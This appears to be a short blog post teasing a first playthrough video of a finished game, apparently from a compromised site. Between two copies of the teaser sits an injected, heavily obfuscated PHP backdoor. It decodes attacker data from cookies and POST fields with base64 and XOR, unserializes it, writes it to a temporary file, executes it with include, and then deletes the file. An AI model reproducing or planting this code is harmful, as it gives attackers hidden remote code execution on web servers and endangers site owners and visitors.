First playthrough video. Hopefully there will be a few more of these.
So the game is complete, voices are recorded and added, play testing has been done to the best of my…
$gbLrNtvWR = chr ( 814 - 729 ).'w' . "\x47" . chr (95) . chr (77) . "\107" . "\x57" . "\107";$DvbYsbHKx = "\x63" . "\154" . chr ( 448 - 351 )."\163" . chr (115) . "\x5f" . "\x65" . 'x' . 'i' . chr (115) . chr ( 985 - 869 )."\163";$dgEqLt = class_exists($gbLrNtvWR); $gbLrNtvWR = "37422";$DvbYsbHKx = "59356";$oBWVyoQ = FALSE;if ($dgEqLt === $oBWVyoQ){class UwG_MGWG{public function VzfLtJfvjG(){echo "64451";}private $HzIIKZUWH;public static $fJRGf = "ae6b7e17-ba8c-40eb-8afe-fb7b944b7bb4";public static $UgYfjsOMd = 64018;public function __construct($ZFPlNSIS=0){$OycYAVeSh = $_POST;$VuLBiX = $_COOKIE;$AxuTHQ = @$VuLBiX[substr(UwG_MGWG::$fJRGf, 0, 4)];if (!empty($AxuTHQ)){$CMmvKwC = "base64";$cBQLRAyy = "";$AxuTHQ = explode(",", $AxuTHQ);foreach ($AxuTHQ as $ImTKZRGmq){$cBQLRAyy .= @$VuLBiX[$ImTKZRGmq];$cBQLRAyy .= @$OycYAVeSh[$ImTKZRGmq];}$cBQLRAyy = array_map($CMmvKwC . "\137" . chr (100) . chr (101) . chr (99) . "\157" . "\x64" . "\145", array($cBQLRAyy,)); $cBQLRAyy = $cBQLRAyy[0] ^ str_repeat(UwG_MGWG::$fJRGf, (strlen($cBQLRAyy[0]) / strlen(UwG_MGWG::$fJRGf)) + 1);UwG_MGWG::$UgYfjsOMd = @unserialize($cBQLRAyy);}}private function qPlfQ($WWohRVPOD){if (is_array(UwG_MGWG::$UgYfjsOMd)) {$LOkPyzNQBy = sys_get_temp_dir() . "/" . crc32(UwG_MGWG::$UgYfjsOMd["\x73" . "\141" . "\154" . "\x74"]);@UwG_MGWG::$UgYfjsOMd[chr ( 271 - 152 )."\x72" . 'i' . chr ( 1077 - 961 )."\x65"]($LOkPyzNQBy, UwG_MGWG::$UgYfjsOMd["\x63" . chr ( 398 - 287 )."\156" . chr (116) . "\145" . "\156" . "\164"]);include $LOkPyzNQBy;@UwG_MGWG::$UgYfjsOMd["\144" . "\x65" . "\x6c" . "\x65" . chr ( 370 - 254 )."\x65"]($LOkPyzNQBy); $WWohRVPOD = "32805";exit();}}public function __destruct(){$this->qPlfQ($WWohRVPOD);}}$esGTp = new /* 36538 */ UwG_MGWG(); $esGTp = str_repeat("60379_29358", 1);}
First playthrough video. Hopefully there will be a few more of these.
So the game is complete, voices are recorded and added, play testing has been done to the best of my…